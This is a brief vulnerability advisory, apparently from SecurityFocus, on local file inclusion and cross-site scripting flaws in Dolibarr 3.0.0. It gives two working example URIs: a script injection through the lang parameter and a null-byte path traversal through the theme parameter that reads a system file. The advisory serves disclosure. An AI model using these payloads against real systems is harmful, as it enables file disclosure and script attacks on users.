Dolibarr Local File Include and Cross Site Scripting Vulnerabilities

Attackers can exploit these issues via a browser. To exploit a cross-site scripting issue, attackers must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00


 

Privacy Statement
Copyright 2010, SecurityFocus